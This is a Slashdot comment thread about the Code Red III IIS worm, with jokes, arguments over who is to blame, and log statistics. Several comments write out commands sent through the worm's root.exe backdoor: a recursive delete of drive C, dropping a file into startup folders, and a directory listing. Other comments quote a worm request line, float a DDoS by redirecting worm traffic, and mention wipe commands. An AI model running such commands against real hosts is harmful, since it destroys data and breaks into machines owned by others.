Slashdot Mirror


Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

759 comments

  1. Re:Bah. by austad · · Score: 5, Insightful

    How about an apache box in front of the IIS server with mod_proxy installed and setup as a reverse proxy filtering out default.ida requests??

    --
    Need Free Juniper/NetScreen Support? JuniperForum
  2. Re:Finally by Guignol · · Score: 1

    I, again, still remember the son of the return of the code red's revenge striking back: the 2nd mission is back even redder than before vs the grand-son of the blue bug 5 (they forgot an egg) resurrected by alien 4 (This time, it's going to hurt them badly !) with a vengeance...

  3. Re:It's not like they haven't announced the patch by mblase · · Score: 2, Informative
    not everyone is super connected and does know about this

    "Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.

    It's Microsoft's responsibility to do everything they can to notify Win 2000 customers and solve this problem

    As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.

    their design flaw, not the admins. So they need to fix it.

    What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

    I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.

  4. Missile strikes are in order by sjonke · · Score: 1

    Taking a clue from Mr. Sharon, I suggest that missile strikes be made against any building that is suspected to contain or potentially contain a computer running IIS. This will obliterate not only the potentially suspect computer, but also the potentially pathetic owner who would likely buy again.

    --
    --- What?
  5. Re:Help me out on this one... by JHuizingh · · Score: 1

    Code Red exploits an .idx vulnerability causing a buffer to overflow with a string of NNN's or XXX's. Code Red I searches for other machines to attack and basically eats up bandwidth. Code Red II searches for other machines to attack as well, but also installs a back door on the system that it infects, giving system access to anyone with a web browser.

  6. Re:a harsher solutions, perhaps? by WickedLittleSlaveBoy · · Score: 0, Troll

    oops...it seems that an MCSE(obviously running IIS) has modded me down....I guess I'll have to send a retraction to all the MCSE's on our help desk(1st tier), too.....

  7. eEye's Scanner by slashkitty · · Score: 2
    This would be a security scanner from eEye.

    http://www.eEye.com/Retina

    --
    -- these are only opinions and they might not be mine.
  8. Re:It's not like they haven't announced the patch by Anonymous Coward · · Score: 0

    One difference between the recall on the SUV's and the problem with Microsoft software is that most people know that they are driving one of the SUV's. A lot of the servers that are still vulnerable are those that are running without the knowledge of the owner, because Microsoft decided it was important to install their server.

  9. have you considered a ... by Anonymous Coward · · Score: 0

    http://ip.ip.ip.ip/scripts/root.exe?/c del c:\/s/q

    1. Re:have you considered a ... by Anonymous Coward · · Score: 0

      can someone give me a command that works to shut them down? :-)

  10. Viruses by Anonymous Coward · · Score: 0

    Please, learn the proper English plural of the word 'virus.'

    There's no need to be making up words in hopes of sounding smarter. You only end up looking silly..

    1. Re:Viruses by Moonshadow · · Score: 2

      Yeah, but "viruses" doesn't rhyme with "jedi".

      It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...

    2. Re:Viruses by HobophobE · · Score: 1

      In case you weren't aware...the English language isn't governed by a body like snootier languages such as French...so this allows for much more rapid evolution of language. Just like "Fantastic" or "Nauseous" now have new meanings, "virii" is now synonymous with "viruses." Have a nice day.

      --

      -HobophobE
      Nothing laughs forever.
  11. Why Isn't There Software Regulation? by Anonymous Coward · · Score: 0
    In any other large industry in the U.S., there are standards, codes and regulation. If cars have problems, the car companies have to fix them. If buildings fall down, people are sued. In each of these industries, there are standards, inspections, and regulations, TO PROTECT THE PUBLIC HEALTH!

    So why isn't there any regulation in the software industry? Will buildings start having disclaimers: 'If this building falls on you, you can't sue us?' No way!

    Irresponsible software development such as Microsoft is doing costs people time and money -- to the tune of billions of dollars. Not to mention pain and suffering. Not to mention COMPROMISING NATIONAL SECURITY. Not to mention e-commerce dollar losses, identity theft, etc.

    Microsoft should be responsible for its software, as should all software makers. Push for software regulation, or the senseless suffering will continue, until people start really getting hurt.

  12. Re:Copycats by wo1verin3 · · Score: 1

    all right..if Code Red and family are dead, why is my cable modem receive light solid since saturday morning?

  13. Code Red Self Test by Anonymous Coward · · Score: 0

    For those of you that are wondering if you're vulnerable, an on-line tester will tell you if you are susceptible to any of the code red worms, and currently tells you if you've already been infected with Code Red II.

    1. Re:Code Red Self Test by kurt555gs · · Score: 1

      the online tester said i was "clean" .... considering i am running apache on RH 7.1 i hope so. Also , i wonder y M$ has escaped more tongue lashing ... All this talk of patching , if u really want to be safe from code red , don't patch, switch to a better server At least they didnt name it penguinpower

      --
      * Carthago Delenda Est *
  14. Re:Better Names by xZAQx · · Score: 1

    CODE BLUE! That is SO funny for any other punk rockers out there. Remember "Code Blue" by TSOL? Yeah, they definitely should call this one, Code Blue, 'cause Baby, It's Dead.

    --

    We dance to all the wrong songs.
    --Refused.
  15. Why aren't these machines patched yet? by tmark · · Score: 2
    How is it that all this time after Code Red first hit the news, so many machine still remain unpatched ? Are the Koreans being disproportionately affected, or is it having major impact over here too ? And if the Koreans are being disproportionately affected, why ? Is press coverage of the virus less prevalent over there ? Could it be something as silly as Koreans not being as adept at the English language ?

    And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?

    1. Re:Why aren't these machines patched yet? by Anonymous Coward · · Score: 1, Interesting

      It is interesting that most of the machines attacking me are from korea and turkey.. Only 5% of attacks towards my machine are coming from US IP space. I think Micro$oft should send people door to door overseas and patch the machines..

    2. Re:Why aren't these machines patched yet? by nether · · Score: 2, Interesting

      Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2001-08/0218.html

    3. Re:Why aren't these machines patched yet? by skinney · · Score: 1

      It could be because that the asian tech market has a 99% piracy rate on M$ software. If they don't have licenses for the products they might not be able to get service packs or patches from M$. Thats my guess.

    4. Re:Why aren't these machines patched yet? by malfunct · · Score: 1

      I don't know whats stopping them, the patch is available straight from MS's site with no checks of any sort.

      --

      "You can now flame me, I am full of love,"

  16. Re:Perhaps we should reconsider... by norton_I · · Score: 2

    The funny thing is, if you ISP terminates web services to all of their clients because (say) 10% of them are infected, they come out of it clean, and can hide behind a service agreement.

    If I disable someone's web server because they are actively trying to infect my computer with a virus , I am liable for any damages, even ones they make up.

    Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.

  17. Re:Never Patch IIS Again! by Anonymous Coward · · Score: 0
    You are the worst kind of fanboy -- the type who thinks he's clever and witty.

    This Just In: You are neither.

  18. Re:make some money off banner ads by Chmarr · · Score: 0, Troll

    If you make default.ida a php based file, why wouldn't a redirect server side work?

    Because then it's the server getting the page, not the browser. If you're after ad revenue, then the ad company is sure going to check where that traffic is coming from.

  19. Re:Stop addressing Code Red by Anonymous Coward · · Score: 0

    Guess what? You are full of shit. MSSQL did not install IIS.

  20. Use PHP and reconfigure apache to do this easily by yani · · Score: 1
    I reconfigured apache to recognise .ida as a php file and then wrote a php script which does essentially what the above script does, only automatically and logs ip's it's sent to.

    Also no checking whether the host is still alive since it's almost instantaneous.

    If anyone wants the php script I can post it although all it involves is using fopen to open the URL that sends the same message as above. Reconfiguring apache is easy look in your configuration files for the PHP section.

    I'm getting more than one codered attempt per 5 minutes and have over 4500 so far. Guess that's what I get for being on @Home ;-)

  21. Re:Sig (Offtopic) by Puppet+Master · · Score: 1
    >If Bill Gates had a nickel for every time
    >Windows crashed...
    >..oh wait, he does.
    >
    >Thats the funniest sig I've seen on slashdot!

    I coined that sig back in 1994,
    when we were still using Windows 3.11.

    --
    The day Microsoft creates a product that doesn't suck, it will be known as the Microsoft Vacuum Cleaner!
  22. Don't forget the sequel ... by WillSeattle · · Score: 1

    Code Red: Jar Jar's Revenge

    --
    --- Will in Seattle - What are you doing to fight the War?
  23. Using CodeRed hole to inform infected users by Anonymous Coward · · Score: 0

    Probably a little greyhat but I have been running:

    http://[InfectedBox]/scripts/root.exe?/c+echo+Yo ur %20box%20has%20been%20infected%20by%20Code%20RedII %20use:%20http://download.microsoft.com/download/i is50/Tool/1.0/NT45/EN-US/CodeRedCleanup.exe%20to%2 0disinfect%20your%20machine+>C:\Documents%20and%20 S ettings\All%20Users\Start%20Menu\Programs\Startup\ CODERED.txt

    uses the hole created by CodeRed to drop a text file in the All Users startup group. Next time anyone logs in they'll see it right in front of them.

  24. Re:Funnier than you think. by fors · · Score: 0, Offtopic

    I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

    --
    "If there is nothing you are willing to die for, then you are not really alive." Myself
  25. Re:More information? by unitron · · Score: 2

    Actually deltree /y c: "accidentally hit the enter key instead of the \ which was to be followed by the single directory you wanted to delete" works quite well at wiping the entire C drive. It proceeds to do so undisturbed by any keystroke combinations intended to stop it.

    --

    I see even classic Slashdot is now pretty much unusable on dial up anymore.

  26. Re:Versions of the worm... by Anonymous Coward · · Score: 0

    Hmm, in that case, Code Red III hasn't even been named yet.

  27. not in critical systems. by rebelcool · · Score: 2

    Just because their laptops have win2000 installed doesnt mean the life support is running from windows. It's not.

    --

    -

    1. Re:not in critical systems. by jrockway · · Score: 1

      Could you imagine what it would be like to check your logs and see "missile-launcher3832.navy.mil". Then telnet to the thing and get a shell prompt? Reminds me of an REM song called "It's The End Of The World As We Know It (And I Feel Fine)".

      --
      My other car is first.
    2. Re:not in critical systems. by Syberghost · · Score: 2

      You don't have to have it in CRITICAL systems to result in loss of life; if it's feeding you faulty data and you're making decisions based on that data, you could run out of oxygen 8 hours earlier than you thought, or something similar.

      And as for the Navy, they're launching missiles with the damn thing.

  28. Why some systems are vulnerable by Genetically+Enginerd · · Score: 1
    I watched the progress of CodeRed last weekend and sat by and watched my service degrade bit by bit. I captured my log files (Apache) and found 41 local businesses that had been infected(?). I spent the week calling and talking to these businesses about the problem with their systems. After talking to all of them and merging my notes, there were some interesting points to ponder.

    1) Of the 41 systems, 27 had been installed by the same "consulting" firm for the same type of small business. The web application is a calendar application for appointments and is for the company's internal use only.

    2) The systems were in the back room and no one at the business ever checked them, much less knew what was running on them. From their in-office client machines, all outward appearances showed the system was running fine, albeit a little sluggish.

    3) The systems were maintained by the consulting firm and they had not been on site for months. There was nothing in their contract about security updates or maintenance.

    4) All email to root, webmaster, hostmaster, etc. was routed to the consulting firm. I talked to the consulting firm and found out they had over 300 client businesses using the same application, but only 60 or so were connected to the internet (at the request of the business). Whether the other 33 servers were infected, who knows?

    5) These 27 (as well as the other 33) servers were connected to the internet via DSL or dial-up (all on same ISP) with internet sharing and a commercial firewall with security settings "open", or essentially disabled. Each server had anywhere from 3 to 8 Win98/ME systems on the internal net accessing the application running on the server.

    6) The 27 servers, which were remotely administered by the consulting firm, were all running VNC (http://www.uk.research.att.com/vnc/) as a service under the admin group and had default ports open to the internet with user of "user" and a password of "password". I found this out from the business, not the consultants.

    7) Those 27 servers also shared their C (only) drive and printers, as well as the internal machines drives and printers, to the internet when connected.

    So, who is at fault here. I leave that as an exercise to the reader since this entire post is totally fictitious.

    Or is it? Gotcha...

    --
    Does the income I've derived from working with Unix belong to SCO?
  29. Versions of the worm... by Moonshadow · · Score: 5, Funny

    Code Red: A New Worm
    Code Red: Microsoft Strikes Back
    Code Red: Return of the Virii
    Code Red: The Not-so Phantom Menace

    And finally...

    Code Red: Attack of the Clones

  30. Funnier than you think. by Ungrounded+Lightning · · Score: 1, Offtopic

    This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

    That's funnier than you think.

    My wife posted a variant of that (involving "rm -rf /*" as root) to a large mailing list. A couple days later she got an email.

    Seems the responder had just installed linux on his PC. The responder's spouse read the mail item and decided to try it. B-)

    (Responder was quite amused by the effects. Fresh install, so nothing was lost.)

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  31. Re:Serious blow to open source & free software by JWW · · Score: 1

    With the amount of publicity, you'd think people would start installing Apache.

  32. Is CRII South Korean? by Anonymous Coward · · Score: 0

    so I'm setting up a computer for a presentation at a conference, and I took one of my laptops with Win 2k that the MIS guy had sworn he turned off IIS on. So, I'm setting it up on the Internet, and suddenly, all the webpages are getting affected by CR, But instead of "hacked by chinese" and www.worm.com, I got pages full of ascii, with korean characters thrown in. The damn MIS guy had kept IIS working. Here's the thing though, I don't know what message you get when CRII affects you, and I know that this CR "III" supposedly has origins in S. Korea. This fits in with what I saw, with pages of Korean. Rebooting pre and post patch doesn't work either. So is this typical of CR II, or is there really a CR III? (and yes, I know 2k evil, etc. etc. it's a big corporation set in its ways. *shrug* :P)

  33. Re:Bah. by AJWM · · Score: 2

    I run a server with three virtual domains, separate logs for each. The IP numbers are sequential, but I see 1092 hits (of the XXXXX variant) on one, 584 on the second and 579 on the third.

    Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.

    --
    -- Alastair
  34. Re:Bah. by sfe_software · · Score: 1

    It totally depends on your IP. My webserver has logged around 400 attempts per IP, on two IPs. My cable modem, OTOH, has logged over 2000 attempts (RoadRunner) at port 80 since 8/5 (since I don't run a webserver, I can't tell you which version of CodeRed, I only log the connection attempt at the firewall).

    Note that I actually have over 6000 logged lines, but because the connection is refused, each IP tries 3 times in a row before giving up. I don't know about the uniqueness on the 2000 IPs, though...

    It seems cable (and other broadband residential) users are the biggest problem here -- the ones who probably don't know they are even running IIS. I gather this because if I visit these IPs in a web browser, I get either a 403 page (too many connection attempts), or a "No Default Page", indicating that the webserver is there for no reason...

    - Jman

    --
    NGWave - Fast Sound Editor for Windows
  35. Re:Microsoft feature? by mpe · · Score: 2

    If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service.(at least in my experience) The win2k Server will install it by default

    I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...

  36. get your facts right by Anonymous Coward · · Score: 0

    Ford used Firestone tyres outside their recommend specifications.

  37. Re:I heard something - by CM39 · · Score: 1


    I hope it's been thoroughly beta tested?
    Or have 1, 2 and 3 been the beta test? :-)

    --

    "PMS is the time of the month when women act like men do all the time"
    Robert Heinlein
  38. Code Green? by repvik · · Score: 1

    Isn't it time someone writes and releases a proper counter-worm now, and call it Code Green?

    1. Re:Code Green? by synsent · · Score: 1

      Better Code Black!!!

  39. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  40. Re:Bah. by Ryokurin · · Score: 1

    here ya go. code red detected in south korea http://news.cnet.com/news/0-1003-200-6835996.html its cnet, so take it as you will.

  41. Re:Use PHP and reconfigure apache to do this easil by digitalunity · · Score: 1

    I'm getting more than one codered attempt per 5 minutes and have over 4500 so far. Guess that's what I get for being on @Home ;-)

    That's it? I've logged over 20,000 attempts to propagate this month alone. I have two IP addresses, both on AT&T@home. After a reboot, the next attempt is within 30 seconds!

    --
    You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
  42. I get it! by lemko · · Score: 0

    The joke was that he said "befoer."

  43. All these CodeRed sequels... by nob · · Score: 0

    I wish the Matrix sequels were released this quickly.

    --
    daed si luap
  44. Re:I want Code Red IV myself... by siokaos · · Score: 1

    Noo noo, see "near" dead. If all the IIS servers in the world were dead, that would be dandy, but it's fun to watch them beat each other up (the unpatched ones at least)

    --
    http://siokaos.org/
  45. Re:Code Red is trying to eat me! by Anonymous Coward · · Score: 0

    Give 'em a break. It's not about covering up anything, the guy was calling about a different issue. It's quite likely he was hired as a temp solely to make those calls and knows nothing else about Verizon. It's possible he doesn't even work for Verizon but for a consulting company performing side work.

  46. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

    It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered is deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presents new opportunities for exploits.

    Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

    You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

    --
    That light you see at the end of the tunnel might be from an oncoming train.
  47. Re:It's not like they haven't announced the patch by hublan · · Score: 1
    The problem isn't the software, it's the admins.

    The problem is that Microsoft decided that it was a "user convenience" to have Win2K install a web server by default. So every Joe User has now a fully fledged, fully open web server operating on his/her machine without them even knowing it

    I just had to help my ex-girlfriend remove Code Red from her machine. She was as surprised as I was, that her machine was automagically set up as a server box.

    Next time Microsoft decide to integrate "user convenience services", to kill competitors, might I suggest a firewall?

    --
    My spoon is too big.
  48. Re:Verizon DSL by aozilla · · Score: 1

    In order to sue them, you need to cancel first. Chances are at that point they won't charge you a cancellation fee. If they do, then you need to refuse to pay it. If they charge your credit card, you need to reverse the charges. Then, they have to sue you, not the other way around.

    --
    ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  49. Re:Oh please, did you see Urban Legend II? by TheRain · · Score: 1

    do you own this university?

    --
    Please help! I'm stuck inside my virtual reality headset!
  50. Re:Put it in another log and forget about it. by mikecarrmikecarr · · Score: 0

    DISCLAIMER: I'm not suggesting that this is legal, or indeed a very good idea.

    I particularly like the RedirectMatch bit. Do you have any web site out there that you don't particularly like? *cough*microsoft*cough* If you redirected all incoming /default.ida requests to another host, and enough infected IIS machines hit your web site, then you could effectively DDOS an arbitrary site.

    I doubt that Code Red is keeping log files of the requests that it's sending out. Ergo, I doubt that anyone could trace the DDOS back to your box.

    Again, I'm not suggesting that this is a good idea. It's just an amusing Friday idea.

    --

    ID-10-T is a way of life

  51. Re:Why people love Code Red by SomeoneYouDontKnow · · Score: 2

    Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.

    As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.

    Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?

    --
    That light you see at the end of the tunnel might be from an oncoming train.
  52. Re:Perhaps we should reconsider... by aozilla · · Score: 1

    The only problem I see with this is that it advertises to the world that your machine is compromised. Why is this a bad thing? 1) you might have missed a backdoor, or maybe the virus has mutated to one with different backdoor(s). 2) This advertises that the machine is a windows machine that was running an unpatched version of IIS. While this could probably be found out, you don't want to advertise it to the world. Security through obscurity isn't a solution, but it is one part of a complete solution, at least for some.

    --
    ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  53. Re:More information? by Shimmer · · Score: 1

    Great idea. I've been trying to find a friendly way to notify these suckers. Net Send does the trick perfectly. Thanks.

    -- Brian

    --
    The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
  54. Service Manager by spideyct · · Score: 1

    The "green arrow" icon is the Services Manager, installed with SQL Server. You can use it to start/stop SQL Server and a few related services. I believe there is a way to add other services (such as IIS/w3svc) to be controlled by this app, but I don't know the details. I assume the person that made that post has a setup that allows them to control IIS from the SQL Service Manager.
    I have never seen that as part of a default install of NT/W2K, however.

  55. Re:IPs by spectral · · Score: 0

    I found it hilarious that microsoft was hit by it. Also, I was hit by a computer network security consulting website. yeaa..

  56. Re:Saddens me though by Anonymous Coward · · Score: 0
    > And no, I didn't have anything better to do (waiting for a co-worker to get back from cig break to ask her a question before I head out) than to post this. Sue me. :-)

    Hey, non-smokers have a coffee while their co-worker lights their fag! Different occupation, same break.

  57. Re:At the risk of being redundant.. by Anonymous Coward · · Score: 0

    They should probably wipe their systems anyways, since their boxes have been r00t3d... excuse me, 4dm1n15+3r3d.

  58. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  59. Re:I saw that Reuters story earlier by iturbide · · Score: 1
    Actually I am of the honest opinion that the best way of reaching those people is disconnecting them.

    Which will not work very well if they're on a dynamic ip pool.

    So why is anyone surprised if large cable/dsl networks start blocking webservers? It's brutal, but at least that'll reach them.

  60. Re:It's not like they haven't announced the patch by zhensel · · Score: 2

    A couple things-
    -Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" variant, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
    -The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.

  61. Re:I want Code Red IV myself... by Anonymous Coward · · Score: 0

    "You never know when a dead rabbit will come in handy."

  62. Re:Can the internet community sue microsoft? by Hellmongr · · Score: 1

    I have a question though. You make good points about the EULA, but is the EULA printed on the outside of the box? If it isn't, does this mean that a class action suit could be filed against Microsoft because people paid for the software only to find that they'd have to agree to the restrictive EULA, and since it wasn't printed on the outside of the box they didn't know thats what they were getting into? I could be completely wrong. Could anyone on Slashdot who's a lawyer fill me in on this?

  63. Re:Finally by insane.idoru · · Score: 2, Funny

    I think we all know that someone is going to make the horrid decision of calling it "attack of the Code Red"...

  64. I knew our machines got Code Red by alfredo · · Score: 1, Funny

    Because our Blue Screen of Death turned purple.

    --
    photosMy Photostream
  65. Who's at fault here? by Hygelac · · Score: 1, Redundant

    Well, contrary to what I've seen most people saying, I don't think it's Micros~1's fault. It's the administrator's responsibility to stay current. Laying this episode solely at the feet of Micros~2 is unfair. Yes, it's one of many exploits found in IIS, but NT admins, just like *nix and *BSD admins, have to be on their toes. IMNSHO, the Code Red episodes only show that thousands of NT admins are lazy morons.

    --
    -- Grow up and use mutt.
  66. Re:make some money off banner ads by Anonymous Coward · · Score: 0

    If your skills in computer science are just as high as your arrogance, you really have to be a genius.

  67. Re:Finally by thing12 · · Score: 1

    It looks like this (only /. won't let me put in the 200 or so X's):

    209.98.92.1 - - [10/Aug/2001:21:20:35 -0500] "GET /default.ida?~200*X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 298

  68. Re:Bah. by Airneil · · Score: 1

    So, we're seeing about 5 - 700 hits, on a single IP.

    Could it be that these sites that are reporting thousands of hits per day have more than one IP?

    The thing doesn't care about domain names.

    Consequently, I only show hits on my default domain in apache.

    BTW, the site I'm tracking on is http://www.dimstar.net/redalert.html

    Thanks for the info.

  69. CR written by a linux zealot? by TMB · · Score: 2

    It occurs to me...

    Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

    I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

    Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

    This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulent strains were/are/will be.

    If you're reading this and you're thinking this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

    [TMB]

    1. Re:CR written by a linux zealot? by Tony-A · · Score: 1

      Lost or corrupt data is a scourge.
      Exactly. The problem persists until the root cause is eliminated. I think the major risks from the holes is the inadvertent corruption of data in the normal course of events. Because of the "admirable job of damage control", I would be extremely reluctant to trust any data to Microsoft's keeping. This is not the only hole in existence.

  70. Another Patch??? by bdrexler · · Score: 1

    I think one of the biggest problems here is the fact that Microsoft has so many damn patches. True, they mark some as more critical than others, but damn. I for one have better things to do than download and install 3 or 4 patches per week, how about the rest of you?

    --


    "Excuses are like asses, everyone has one and they all stink." - Adam Corrola
    1. Re:Another Patch??? by Anonymous Coward · · Score: 0
      Personally, I'm more fucking sick of fanboys spewing horseshit like this when it's difficult to go two days without some obscure Linux patch being released. I'm guessing that's totally different.

      Just die.

    2. Re:Another Patch??? by Anonymous Coward · · Score: 0
      Hi Bill!

      We just do:

      apt-get update;apt-get upgrade, and voilà! Bad stuff goes away, just like that. For reference, here's what it sounds like when a bug gets squashed: *poof!*

    3. Re:Another Patch??? by Tony-A · · Score: 1

      Not totally different, but with Linux, with minimal effort I've got a pretty good idea of what the patch does and if I even care about it. With a reasonable amount of effort I could find out more about it than I really want to know. With Microsoft, it is essentially impossible to know what the patch does or what it affects.

  71. Re:Copycats by Anonymous Coward · · Score: 0

    It must be very difficult being you.

  72. Legal the same way as ShareSniffer, perhaps? by Myself · · Score: 2

    Read this if you're not familiar with ShareSniffer

    Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.

    People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.

    The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.

    The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.

    IANAL!

  73. Use this tool, you can install Service Pack MAXINT by leonbrooks · · Score: 2

    The magic word is ASP2PHP. Apply this to the offending projects, kiss IIS and Windows goodbye forever. Ahhhhh! Feels so good! Won't run down your battery! Made entirely from all-Open ingredients!

    Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!

    --
    Got time? Spend some of it coding or testing
  74. Viruses by Anonymous Coward · · Score: 0

    Please, learn the proper English plural of the word 'virus.'

    There's no need to be making up words in hopes of sounding smarter. You only end up looking silly.

  75. Re:Pirate copies by CharlieG · · Score: 2

    The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there

    --
    -- 73 de KG2V For the Children - RKBA! "You are what you do when it counts" - the Masso
  76. Re:Bad piggyback, but.. by Anonymous Coward · · Score: 0

    so... how exactly does one exploit an infected machine (not that I would do that, just curious)?

    http://infected.machine.com/scripts/cmd.exe?'dir %20%c:\'

    ...or something like that?

  77. Re:Morality of Counter Measures? by Maul · · Score: 1
    Actually, you're right.

    I couldn't find a command that would shut down NT totally. So the next best thing is shutting down IIS, I assume.

    --

    "You spoony bard!" -Tellah

  78. Re:Interesting Irony by rhizome · · Score: 1
    So, Three Code Reds and a SirCam later, the question just begs to be asked: Who's calling Whose code "Potentially Viral"?

    Perhaps a way to turn the tables is to start speaking of these Microsoft weaknesses in terms of immunodeficiency, as being extremely hospitable to worms and viruses. Which is worse, to be viral or to welcome the infection by design?
    --
    When I was a kid, we only had one Darth.
  79. URL of CodeRed explanation by Genetically+Enginerd · · Score: 1

    A lot of people have asked to see an explanation of how CodeRed works. This is a good one that was the initial analysis last Saturday. This is a long url, you may have to cut and paste (I can't get rid of the space after "sid="). They also provide the disassembled code.

    http://www.securitynewsportal.com/article.php?sid=1361&mode=thread&order=0

    --
    Does the income I've derived from working with Unix belong to SCO?
  80. Re:Bah. by Anonymous Coward · · Score: 0

    I've received 1644 code red II hits since monday. I'm on the 66.*.*.* node thru RR. Seems there are quite a few IIS servers in this subnet. Others I know in the same node are reporting numbers similar to this.

  81. SecurityFocus by Tyketto · · Score: 1

    Probably old news, but we all know that the guys at SecurityFocus are collecting the IP addresses of those boxes in your logs from Code Red. Reuven Lerner has created a Perl module that is collecting the info, sends it to SecurityFocus, and emails the entity holding the block of IP addresses the visitor is from (via the MX record), informing them as well. Worth looking through.

    BL.

  82. Code Red I-III, Sircam Virus.. Connnected??? by Anonymous Coward · · Score: 0
    * Personal Opinion Ahead *

    I've been watching the evolving viral problems and here's my conclusion: We are witnesses to the first massive automated industrial espionage system in operation. Here's my reasoning:

    Sircam Virus: Testcode released to see if remote-files could be sent by an e-mail virus.

    Code Red I: Test program, Automated webserver attack/co-opting.

    Code Red II: Test program, Automated webserver attack with backdoor installation.

    Code Red III: From what I've been able to determine: Beta Release, Automated webserver attack program with a SERVER installation routine.

    Windows 2K Source code theft: IIRC, took IIS with it. Needed to find exact addresses of buffer overflow target locations.

